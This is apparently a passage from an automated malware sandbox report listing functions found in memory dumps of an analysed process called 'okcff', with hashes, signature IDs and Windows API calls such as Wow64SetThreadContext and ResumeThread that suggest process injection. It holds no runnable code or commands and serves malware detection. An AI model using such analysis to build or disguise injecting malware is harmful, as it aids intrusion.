                                                            • Opcode Fuzzy Hash: 055d7bf4b417f710684b99ed9e31b1d13ed54de122b7ffd2c2b82166be0a75e1
                                                            • Instruction Fuzzy Hash: 9A41A8B9D042589FCF10CFA9D584AEEFBB0BF59314F24942AE814B7210D335AA45CF64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021AB310, Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • K32EnumProcessModules.KERNEL32(?,?,?,?), ref: 021AB3B6
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: EnumModulesProcess
                                                            • String ID:
                                                            • API String ID: 1082081703-0
                                                            • Opcode ID: 7c5d364116172a38cdc836adb57d12f900ee7b85dc2ed2a4527eef77074e8a58
                                                            • Instruction ID: b9968c9843b22910cbac6a2f6ac1cfbf5aeaad23fb6cfc0aed375fb7b2bc14fd
                                                            • Opcode Fuzzy Hash: 7c5d364116172a38cdc836adb57d12f900ee7b85dc2ed2a4527eef77074e8a58
                                                            • Instruction Fuzzy Hash: A03176B9D042589FCF00CFA9D984AEEFBB0BB59314F14942AE814B7210D375AA45CF64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021A885A, Relevance: 1.6, APIs: 1, Instructions: 97threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 021A890F
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: ContextThreadWow64
                                                            • String ID:
                                                            • API String ID: 983334009-0
                                                            • Opcode ID: 7cd48d4a32e1e62dae9fc58f3acd035e256c7353f61101cf6da0f389f38e700f
                                                            • Instruction ID: 5873f936c88faa23e093f01d456d66165889cd85187b5037cff1db9cffd26a91
                                                            • Opcode Fuzzy Hash: 7cd48d4a32e1e62dae9fc58f3acd035e256c7353f61101cf6da0f389f38e700f
                                                            • Instruction Fuzzy Hash: 0741BBB5D042589FCB10CFA9D984AEEBBF0BF59314F24842AE414B7240D7389A85CF54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021A8860, Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Wow64SetThreadContext.KERNEL32(?,?), ref: 021A890F
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: ContextThreadWow64
                                                            • String ID:
                                                            • API String ID: 983334009-0
                                                            • Opcode ID: 8713773f383a2933c1be02154cf9b12c504488ef1036effb93c988599086ee88
                                                            • Instruction ID: 119fe4d504c4185cd6f44b5c5987f863575ea31f3a42a241bfa82ea6641c6c6c
                                                            • Opcode Fuzzy Hash: 8713773f383a2933c1be02154cf9b12c504488ef1036effb93c988599086ee88
                                                            • Instruction Fuzzy Hash: C331ABB5D052589FCB10CFA9D984AEEFBF0BF49314F24942AE414B7240D738AA85CF94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 003D370A, Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.619777746.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_3d0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: ShowWindow
                                                            • String ID:
                                                            • API String ID: 1268545403-0
                                                            • Opcode ID: 5babae724a16998b4b93e5d916a423149af55a1d6330ef442a4ebee9b6fa0340
                                                            • Instruction ID: 163d477bb4e791d0224b0b7889ba709c839c6ae07671781b1ea1b75b4fa2059c
                                                            • Opcode Fuzzy Hash: 5babae724a16998b4b93e5d916a423149af55a1d6330ef442a4ebee9b6fa0340
                                                            • Instruction Fuzzy Hash: 6A31AAB9D052589FCB10CFA9E984AEEFBF0BB59310F24945AE814B7300D335AA45CF65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 003D3710, Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.619777746.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_3d0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: ShowWindow
                                                            • String ID:
                                                            • API String ID: 1268545403-0
                                                            • Opcode ID: 78bec34cc32eaf948b9a8d448fc8dbd58e33cbd1261958da922f14fc84dfff68
                                                            • Instruction ID: 36c50bcbfd8772f8ffb499f30af595e15211a220783cc19256021b5a659ea712
                                                            • Opcode Fuzzy Hash: 78bec34cc32eaf948b9a8d448fc8dbd58e33cbd1261958da922f14fc84dfff68
                                                            • Instruction Fuzzy Hash: 6631B9B9D052189FCB10CFA9E984ADEFBF4BB49310F24941AE814B7300D374AA45CF65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021A86E8, Relevance: 1.6, APIs: 1, Instructions: 77threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: 84236b3a0ba594f526b33a29b582b3fe76a560373ef7b126c184a25de935105f
                                                            • Instruction ID: b110333c2cc3218d204b460ceb29acba33a14e07b9a469080f62804bc48354ce
                                                            • Opcode Fuzzy Hash: 84236b3a0ba594f526b33a29b582b3fe76a560373ef7b126c184a25de935105f
                                                            • Instruction Fuzzy Hash: F731DAB8D042489FCF14CFA9E994AEEFBB1AF59314F14942AE815B7300D735A941CF94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021A86F0, Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621272751.00000000021A0000.00000040.00000001.sdmp, Offset: 021A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_21a0000_okcff.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: 5682e1d94ac2466aacda9c2879acaf86acddfb07fdae91befab41686713803cf
                                                            • Instruction ID: 0ce865c4bb9e3cf85d56e431a1cbc7e08c3239b8a741e327a92f59c2abfb0323
                                                            • Opcode Fuzzy Hash: 5682e1d94ac2466aacda9c2879acaf86acddfb07fdae91befab41686713803cf
                                                            • Instruction Fuzzy Hash: 7631CAB8D002189FCF10CFA9E984AAEFBB4AF49314F14942AE815B7300D734A941CF94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02110388, Relevance: 1.6, Strings: 1, Instructions: 323COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .@ll
                                                            • API String ID: 0-2625602313
                                                            • Opcode ID: b1a5c61fe8b43a18cd04ab49ff0d929e003e242b39a0429a931525da4aa8c73b
                                                            • Instruction ID: 5fd9544108995c7506a91c25697fad23e88e4b5381cf7fa8499f16e72c6a89a1
                                                            • Opcode Fuzzy Hash: b1a5c61fe8b43a18cd04ab49ff0d929e003e242b39a0429a931525da4aa8c73b
                                                            • Instruction Fuzzy Hash: 6FC14C30E58129DFCB15CFA8D984AAEBBB2FB88304F158576E815E7241D730ED81CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0218D138, Relevance: 1.6, Strings: 1, Instructions: 304COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: fCll
                                                            • API String ID: 0-3231272322
                                                            • Opcode ID: 0672e8a1a12b3c5e43371d71222daea47e383c43c55de38f94ab8fe2eace87c1
                                                            • Instruction ID: 4af744e2ce823e0f17237de2e4629adf671e855e8baa42080e24bfbbac69793e
                                                            • Opcode Fuzzy Hash: 0672e8a1a12b3c5e43371d71222daea47e383c43c55de38f94ab8fe2eace87c1
                                                            • Instruction Fuzzy Hash: D0C16B75B012189FDB14DB68D980BAEB7F6AF8D310F1580A9E509AB391DB30DD91CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021149CB, Relevance: 1.5, Strings: 1, Instructions: 210COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: fCll
                                                            • API String ID: 0-3231272322
                                                            • Opcode ID: 434f64ac2ee81079d72ec0778310258a381eb1fa32b60f1313e3ea74651f4197
                                                            • Instruction ID: b8a0d5b57ada5701d472a042814342d6371d929c76d2c98edd11557d93f886a5
                                                            • Opcode Fuzzy Hash: 434f64ac2ee81079d72ec0778310258a381eb1fa32b60f1313e3ea74651f4197
                                                            • Instruction Fuzzy Hash: C371CF34A44349CFCB08CFA4D8549AEBBB2BF89700B168569D517EB365DB30EC82CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021173B8, Relevance: 1.5, Strings: 1, Instructions: 202COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: fCll
                                                            • API String ID: 0-3231272322
                                                            • Opcode ID: fea90c4c183bdf37aba6dc8e6a7a09e6afe3498f4c0cc6807dcdd4b0785dddf9
                                                            • Instruction ID: d68f74390d6577218433e75873c364b8e3f9103f35c532f59023474ed5800d8e
                                                            • Opcode Fuzzy Hash: fea90c4c183bdf37aba6dc8e6a7a09e6afe3498f4c0cc6807dcdd4b0785dddf9
                                                            • Instruction Fuzzy Hash: D7810C74E54118DFDB18DFA8D594AADFBB6AF48300F158035E916AB790DB30DC42CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0542CF00, Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: ~o
                                                            • API String ID: 0-2881337155
                                                            • Opcode ID: a81ab59989c3fbdb8ec73732ed25e23acd71d672425b4cd96216ac073f2d4b5b
                                                            • Instruction ID: 51e9bb26ca53f0ad982860491e6b1ce217f02f766ea0d9c4b6a9e312da283262
                                                            • Opcode Fuzzy Hash: a81ab59989c3fbdb8ec73732ed25e23acd71d672425b4cd96216ac073f2d4b5b
                                                            • Instruction Fuzzy Hash: 0D51A120B0D2B09FC7169B3088605BD3B735F5A64478644ABE146CB6EACB259D07C7A3
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0211B881, Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: fCll
                                                            • API String ID: 0-3231272322
                                                            • Opcode ID: 2d491b319fc0cbfac626f45ee11f14747240ee42adc419055f913ea4a895f142
                                                            • Instruction ID: 4ea5f2c03f5f3af6e762d7a9470f357a968bd0c6e7e03b51be17d3d9e425c21d
                                                            • Opcode Fuzzy Hash: 2d491b319fc0cbfac626f45ee11f14747240ee42adc419055f913ea4a895f142
                                                            • Instruction Fuzzy Hash: F131F53074D3548FC72A9B269980976BBE6EF8674831688BFD14ACB652DB30DC06C791
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02115330, Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 2
                                                            • API String ID: 0-450215437
                                                            • Opcode ID: a08bdc7d5985164e1a9b6c9c39046481e7a5fba4356f91c8cc1f31d0b15e8297
                                                            • Instruction ID: d6e5ea84de494676cf4f15cc9517a52dc8a2135bec9a0f0b5d3b16ddc4877be8
                                                            • Opcode Fuzzy Hash: a08bdc7d5985164e1a9b6c9c39046481e7a5fba4356f91c8cc1f31d0b15e8297
                                                            • Instruction Fuzzy Hash: 0A316B31A54118FFCB08DFA4E8559EEBB76FF88311F40802AE912A7650DB319A05CB90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0542F4D5, Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: {o
                                                            • API String ID: 0-3603579654
                                                            • Opcode ID: a389ceb33840275ac0cb863fe568b4a20d5ef64c7c041c932be8de6796f08f37
                                                            • Instruction ID: 63b5197a4982da92341fb3215d29d7d06d8c9585a6cff27beee280d150c237e7
                                                            • Opcode Fuzzy Hash: a389ceb33840275ac0cb863fe568b4a20d5ef64c7c041c932be8de6796f08f37
                                                            • Instruction Fuzzy Hash: 4921F520B0C6B06FC315AF3484667AE3FB29F46604FC5009FD102DB783CA25AC8B8792
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0542D488, Relevance: 1.3, Strings: 1, Instructions: 74COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: {o
                                                            • API String ID: 0-3603579654
                                                            • Opcode ID: 7a122f51772bb156d697ed643c77636651a1d321df4161501fd07f2c419f5a4b
                                                            • Instruction ID: c13a76962a25d8e40d5f9611464a131c8600cac06c136c566a71582c5217c173
                                                            • Opcode Fuzzy Hash: 7a122f51772bb156d697ed643c77636651a1d321df4161501fd07f2c419f5a4b
                                                            • Instruction Fuzzy Hash: 5C119031309630AFC220DE69D982BABB7F6FB85714BD1492FE50787B51CA21F84B8751
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05429600, Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .@ll
                                                            • API String ID: 0-2625602313
                                                            • Opcode ID: b955f8c6f1e3afa9776eb4e64c3ab8774ba9d0d103895b85648144a498248ea1
                                                            • Instruction ID: f5c56677d5cb63b718c7b1e3ea3cdee38d8979a2fb56df46891ac29594456fc7
                                                            • Opcode Fuzzy Hash: b955f8c6f1e3afa9776eb4e64c3ab8774ba9d0d103895b85648144a498248ea1
                                                            • Instruction Fuzzy Hash: B81106307046504FC320DB28C9A49A777E6AFC6204765CABEC159CB792DB32D847C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0542F530, Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: {o
                                                            • API String ID: 0-3603579654
                                                            • Opcode ID: 80757877e4234e2127e77485648a2d65ee4878d12876f684c11e027a3e0af204
                                                            • Instruction ID: fd1cc8931e9c4267772708e94c29cdcf67e057730d0957eff634bec6408b5481
                                                            • Opcode Fuzzy Hash: 80757877e4234e2127e77485648a2d65ee4878d12876f684c11e027a3e0af204
                                                            • Instruction Fuzzy Hash: 1801D470708234AFD724DE28C496BAB7FFBAB44604FC0405FE1038B782C661F88A8751
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0211B900, Relevance: 1.3, Strings: 1, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: fCll
                                                            • API String ID: 0-3231272322
                                                            • Opcode ID: c4ba4f44ad3129eaac22304bb259669ac82a31d95fe4e815e94b0306c7c451aa
                                                            • Instruction ID: 75d23369a1de40baef73b930eed4584a25c8c2c005e910a6496e6afa3fb22db7
                                                            • Opcode Fuzzy Hash: c4ba4f44ad3129eaac22304bb259669ac82a31d95fe4e815e94b0306c7c451aa
                                                            • Instruction Fuzzy Hash: 38F02421748128579708356B590567F51CFABC56A8B16803BE20EDB658DF70CD03C2F2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02161630, Relevance: .7, Instructions: 708COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621229391.0000000002160000.00000040.00000010.sdmp, Offset: 02160000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2160000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8f67351955c8c9de9e683d449172698d6538a4f4986f83005d072d748158993d
                                                            • Instruction ID: f5f4b3cfede54d1def268047c320c29a55f935d641bcd52b494dcc086c01fccb
                                                            • Opcode Fuzzy Hash: 8f67351955c8c9de9e683d449172698d6538a4f4986f83005d072d748158993d
                                                            • Instruction Fuzzy Hash: F322E531E052849FCB14CFA8C5595FDBBF2EF8A200F1A84AAD459AB351CB31DC55CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02118D61, Relevance: .6, Instructions: 642COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 02406bf563a57ae9dadd5394ae49e1deec05cf0035239e422a55b318a2f9e2df
                                                            • Instruction ID: 4ce8d5da96b9fde1562ba33f9824782971ce5c4a4b22d07f7da6c0e03434f36d
                                                            • Opcode Fuzzy Hash: 02406bf563a57ae9dadd5394ae49e1deec05cf0035239e422a55b318a2f9e2df
                                                            • Instruction Fuzzy Hash: 7A52E436650500DFDB0A9F98D958D69BBB2FF4D314B1A80E4E2169F272C732E861EF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 021131F0, Relevance: .5, Instructions: 462COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3c0a699ae7b495a49f52e7b46d0a1aa96920a4a727b8214b5aeef20fe1f5449e
                                                            • Instruction ID: f42c272a8ea87826965a4e29db8fb686a6b41850a8a10fb8ee25a9e3c028ab65
                                                            • Opcode Fuzzy Hash: 3c0a699ae7b495a49f52e7b46d0a1aa96920a4a727b8214b5aeef20fe1f5449e
                                                            • Instruction Fuzzy Hash: 9C028E34A44254CFCB19DFA4C554AADBBF2BF89304F2680BAD4269B3A9DB31DC45CB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0218E47A, Relevance: .4, Instructions: 400COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 719b257f2ec38be650a4845c492bac7d855a91ab1f4787c56d75fad01ef9cf7a
                                                            • Instruction ID: 1d6fe13c2b56295df175237ac9d6a6bddf2f06b7182365cf23b82edbf4edbb4f
                                                            • Opcode Fuzzy Hash: 719b257f2ec38be650a4845c492bac7d855a91ab1f4787c56d75fad01ef9cf7a
                                                            • Instruction Fuzzy Hash: AFE1CA30F842029FEB18AF69D49077EBAE2AF85300F154429F9A6DB391DB74D981CB51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0218C600, Relevance: .4, Instructions: 381COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9566f96dd523413b3146b2e41b55fbd4d61100df83c4402eb29526afd84e7b41
                                                            • Instruction ID: 59e71c9dacc4c53e65d4c6f92cf31f46239e804725dcccd0c1ba8518dfa37272
                                                            • Opcode Fuzzy Hash: 9566f96dd523413b3146b2e41b55fbd4d61100df83c4402eb29526afd84e7b41
                                                            • Instruction Fuzzy Hash: 7C02BE34A50114DFCB08EFA4D994AAEB7B2FF89304F158159E905AB3A5DB30EC46CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02112BA0, Relevance: .4, Instructions: 356COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a5cab84e7958f81290ede7219ccab4755b4d9aa058d5e5e48cb96ea117c77892
                                                            • Instruction ID: 3ef6673d02707e061ae40abb389ea7f8cecdededa4546b98abb71c01b55c3a26
                                                            • Opcode Fuzzy Hash: a5cab84e7958f81290ede7219ccab4755b4d9aa058d5e5e48cb96ea117c77892
                                                            • Instruction Fuzzy Hash: 98E18030B042698FCB29DF74C8506ADBBF2AF85200F5589AED51AE7341DB319D45CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0211BD41, Relevance: .3, Instructions: 338COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 35978fb8b25a47e3d7c208b0c6c02aca4ee8d8d4946410100d101777101b4325
                                                            • Instruction ID: 675d992d1a26d326e4becb313e07dc4adc79f6bc036948288f34314a7577762f
                                                            • Opcode Fuzzy Hash: 35978fb8b25a47e3d7c208b0c6c02aca4ee8d8d4946410100d101777101b4325
                                                            • Instruction Fuzzy Hash: E0E11535A0520AEFCF05CF98C9909AEBBB2FF49314B248469E905A7361D731ED51CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0542E658, Relevance: .3, Instructions: 338COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.628276677.0000000005420000.00000040.00000001.sdmp, Offset: 05420000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_5420000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0ed066fd3fba98662d8ebba8f5e20dee9b43f89c34a07ac03a24d648e0d2eeac
                                                            • Instruction ID: e01a3025b944adc72192026c49fd78db46590f7710f12bb3231daa2ddad85140
                                                            • Opcode Fuzzy Hash: 0ed066fd3fba98662d8ebba8f5e20dee9b43f89c34a07ac03a24d648e0d2eeac
                                                            • Instruction Fuzzy Hash: BAB1AC31B082349FCB54DB69C8509BEB7FABF89200B94456FE146DB751CB31E816CB91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02180048, Relevance: .3, Instructions: 337COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621247150.0000000002180000.00000040.00000010.sdmp, Offset: 02180000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2180000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 115f3a5f4a4dd5cda89e1cf11319a55546321356e5932e296e123541a4778084
                                                            • Instruction ID: bf20ee6d53d3a28653a5bee3205734d5f5ef37bf44eeb09a531f2b1b4b84f32d
                                                            • Opcode Fuzzy Hash: 115f3a5f4a4dd5cda89e1cf11319a55546321356e5932e296e123541a4778084
                                                            • Instruction Fuzzy Hash: 52D17E30A44609DFCB18EF64C8D49AEB7B2BF4D314B168569E826AB361D730DC49CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02114D41, Relevance: .3, Instructions: 306COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f8ce8cc4bb90af800a25e9836623c2257719f2e8fe48cee62d1e5a55009cddc9
                                                            • Instruction ID: 162cd6d89188ba6253c58ac626f663938e0c0bab29c27e9037039b0b6f068ff7
                                                            • Opcode Fuzzy Hash: f8ce8cc4bb90af800a25e9836623c2257719f2e8fe48cee62d1e5a55009cddc9
                                                            • Instruction Fuzzy Hash: 13C19C30A84215DFDB199FA4C854BBEBBB3BF84704F254079E512AB394DB768C85CB81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02115A20, Relevance: .3, Instructions: 296COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.621205971.0000000002110000.00000040.00000001.sdmp, Offset: 02110000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_2110000_okcff.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
